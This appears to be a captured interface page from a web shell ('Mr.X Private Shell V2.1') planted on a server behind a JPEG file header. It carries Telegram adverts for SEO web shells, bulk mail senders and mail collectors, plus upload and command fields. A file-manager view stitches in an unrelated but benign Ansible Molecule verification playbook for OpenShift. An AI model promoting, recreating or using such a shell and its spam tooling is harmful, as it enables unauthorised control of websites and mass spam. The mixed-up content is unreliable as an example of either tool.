����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
---
- name: Verify inventory and connection plugins
  # This group is created by the openshift_inventory plugin
  # It is automatically configured to use the `oc` connection plugin
  hosts: namespace_testing_pods
  gather_facts: no
  vars:
    file_content: |
      Hello world
  tasks:
    - name: End play if host not running (TODO should we not add these to the inventory?)
      meta: end_host
      when: pod_phase != "Running"

    - setup:

    - debug: var=ansible_facts

    - name: Assert the TEST environment variable was retrieved
      assert:
        that: ansible_facts.env.TEST == 'test'

    - name: Copy a file into the host
      copy:
        content: '{{ file_content }}'
        dest: /tmp/test_file

    - name: Retrieve the file from the host
      slurp:
        src: /tmp/test_file
      register: slurped_file

    - name: Assert the file content matches expectations
      assert:
        that: (slurped_file.content|b64decode) == file_content


- name: Verify
  hosts: localhost
  connection: local
  gather_facts: no
  vars:
    ansible_python_interpreter: '{{ virtualenv_interpreter }}'

  tasks:
    - pip:
        name: kubernetes-validate==1.12.0
        virtualenv: "{{ virtualenv }}"
        virtualenv_command: "{{ virtualenv_command }}"
        virtualenv_site_packages: no

    - import_tasks: tasks/validate_installed.yml

    - pip:
        name: kubernetes-validate
        state: absent
        virtualenv: "{{ virtualenv }}"
        virtualenv_command: "{{ virtualenv_command }}"
        virtualenv_site_packages: no

    - import_tasks: tasks/validate_not_installed.yml

    - import_tasks: tasks/openshift_auth.yml
    - import_tasks: tasks/openshift_adm_prune_auth_clusterroles.yml
    - import_tasks: tasks/openshift_adm_prune_auth_roles.yml
    - import_tasks: tasks/openshift_adm_prune_deployments.yml
    - import_tasks: tasks/openshift_builds.yml
    - import_tasks: tasks/openshift_route.yml
    - import_tasks: tasks/openshift_import_images.yml
    - import_tasks: tasks/openshift_prune_images.yml
    - block:
        - name: Create namespace
          community.okd.k8s:
            api_version: v1
            kind: Namespace
            name: process-test
        - import_tasks: tasks/openshift_process.yml
          vars:
            files_dir: '{{ playbook_dir }}/files'
      always:
        - name: Delete namespace
          community.okd.k8s:
            api_version: v1
            kind: Namespace
            name: process-test
            state: absent

  roles:
    - role: openshift_adm_groups

Filemanager

Name Type Size Permission Actions
files Folder 0755
roles Folder 0755
tasks Folder 0755
vars Folder 0755
converge.yml File 2.71 KB 0644
destroy.yml File 90 B 0644
molecule.yml File 1015 B 0644
prepare.yml File 1.63 KB 0644
verify.yml File 2.5 KB 0644